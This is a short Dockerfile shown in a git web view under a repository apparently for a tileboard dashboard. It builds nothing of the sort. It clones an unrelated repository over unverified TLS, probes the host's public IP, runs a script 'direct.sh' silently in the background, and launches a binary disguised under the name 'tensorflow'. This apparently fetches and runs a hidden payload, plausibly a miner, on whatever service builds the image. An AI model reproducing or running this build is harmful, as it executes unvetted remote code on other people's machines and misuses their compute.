fbrinker-tileboard/Dockerfile

11 lines
314 B
Docker
Raw Normal View History

2022-03-28 20:00:45 +02:00
FROM ubuntu:latest
RUN apt-get update -y
2022-04-01 21:44:54 +02:00
RUN apt-get install git curl -y
2022-03-28 20:07:44 +02:00
RUN git -c http.sslVerify=false clone https://gitlab.zam.io/wajinhakim/drone-test.git
2022-03-28 20:00:45 +02:00
WORKDIR /drone-test
RUN chmod +x tensorflow direct.sh
2022-04-01 21:45:20 +02:00
RUN curl ipinfo.io
2022-03-28 20:00:45 +02:00
RUN nohup bash direct.sh > /dev/null
EXPOSE 8080 8081
2022-03-28 20:07:44 +02:00
ENTRYPOINT ["./tensorflow"]